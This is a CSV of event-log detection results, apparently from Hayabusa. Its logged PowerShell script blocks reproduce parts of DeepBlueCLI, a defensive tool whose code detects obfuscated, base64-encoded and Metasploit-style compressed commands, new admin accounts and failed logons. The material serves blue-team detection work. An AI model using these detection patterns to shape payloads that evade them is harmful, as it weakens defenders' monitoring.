Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.983 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"g + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. 
# I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.987 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.992 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.994 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:32.379 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:32.379 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:32.379 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:32.380 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:33.354 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:09.934 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:24.665 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.663 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.669 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if 
($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.669 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message 